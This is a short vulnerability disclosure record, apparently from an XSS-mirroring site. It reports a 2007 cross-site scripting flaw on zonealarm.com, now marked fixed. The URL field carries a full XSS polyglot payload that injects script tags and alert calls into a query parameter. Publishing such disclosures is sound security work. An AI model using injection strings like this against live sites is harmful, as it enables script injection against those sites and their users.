Security researcher Nemessis, has submitted on 22/05/2007 a cross-site-scripting (XSS) vulnerability affecting www.zonealarm.com, which at the time of submission ranked 9179 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2007. It is currently fixed. |
Date submitted: 22/05/2007 |
Date published: 22/05/2007 |
Date fixed: 02/11/2007 | Status: FIXED |
Author: Nemessis |
Domain: www.zonealarm.com |
Category: XSS |
Pagerank: 9179 |
URL: http://www.zonealarm.com/store/application?namespace=zls_catalog&origin=global.jsp&event=link.skuLis t&dc=12bms&ctry=US&lang=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,8 3))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"> '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&lid=dbtopnav_zaws&ovchn=GGL&ovcpn=AA_Zone+Al arm+ISS&ovcrn=sr2zl21go868go36pi31ai12+anti+phishing&ovtac=PPC&SR=sr2zl21go868go36pi31ai12 |
Click here to view the mirror
|
|
|